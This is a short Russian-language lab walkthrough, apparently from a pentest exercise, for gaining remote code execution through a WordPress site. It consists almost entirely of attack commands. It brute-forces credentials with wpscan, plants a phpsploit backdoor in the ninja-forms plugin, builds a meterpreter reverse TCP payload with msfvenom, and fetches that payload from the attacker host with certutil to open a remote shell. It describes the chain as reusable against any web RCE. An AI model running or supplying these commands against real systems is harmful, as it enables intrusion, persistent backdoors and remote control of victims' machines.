Получение RCE в лабораторной работе через web-прложение, это просто подход, который можно реплицировать на любую уязвимость вебчика в контексте RCE:
wpscan --url <http://10.152.152.11:8585/wordpress/> --enumerate u -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt
Используя полученные учетные данные нужно зайти с правами администратора и добавить бэкдор в плагин, например, в ninja-forms.
phpsploit
- запуск фреймворка для удобной эксплуатации
phpsploit > set
- получение строки импланта, который можно будет использовать в качестве полезной нагрузки в разделе “Плагины”
phpsploit > set target [<http://10.0.0.101:8585/wordpress/wp-content/plugins/ninja-forms/index.php>](<http://10.0.0.101:8585/wordpress/wp-content/plugins/ninja-forms/index.php>)
- нативно выполняем подсказки консоли и указываем директорию с имплантом
phpsploit > exploit
- выполняем обратное подключение
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.0.2.X lport=4444 -f exe > reverse_tcp.exe # X - последний октет ip-адреса Kali Linux
Kali: python3 -m http.server 80
C2: run certutil.exe -urlcache -split -f [<http://10.0.0.100:80/reverse_tcp.exe>](<http://10.0.0.100/reverse_tcp.exe>)
- загружаем имплант от для получения интерактивное оболочки meterpreter